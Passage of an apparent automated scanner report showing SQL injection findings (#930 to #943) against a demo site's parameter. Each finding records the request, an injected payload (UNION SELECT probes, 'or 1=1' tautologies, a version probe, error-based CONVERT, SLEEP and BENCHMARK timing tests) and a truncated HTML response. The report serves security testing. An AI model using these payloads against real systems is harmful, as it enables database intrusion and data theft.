href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #930\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #931\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin' or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #932\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 28--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #933\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #934\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,3,1))='c'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #935\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #936\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #937\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #938\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #939\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #940\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #941\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io -1' UNION SELECT 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #942\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #943Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 